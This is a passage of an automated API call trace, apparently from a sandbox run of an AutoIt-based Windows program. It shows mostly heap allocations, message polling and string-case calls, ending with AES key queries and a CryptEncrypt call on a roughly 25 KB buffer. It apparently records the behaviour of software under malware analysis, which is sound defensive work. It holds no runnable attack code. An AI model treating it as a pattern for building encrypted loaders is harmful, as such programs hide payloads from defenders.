lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0032.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2f8 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0032.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0032.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.608] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0032.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.609] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0032.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0032.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0032.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0032.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.609] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0032.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0032.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0032.610] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0032.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.611] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0032.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0032.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0032.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0032.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0032.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0032.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0032.614] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da268, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da268*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0032.614] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.614] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.614] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.614] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.614] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.614] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.615] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.615] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.615] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0032.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.615] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.615] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.615] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.615] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.615] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.615] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.615] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.615] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.615] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.616] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.616] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x61b4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x61c0) returned 1 [0032.616] CharLowerBuffW (in: lpsz="byte[25025]", cchLength=0xb | out: lpsz="byte[25025]") returned 0xb [0032.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 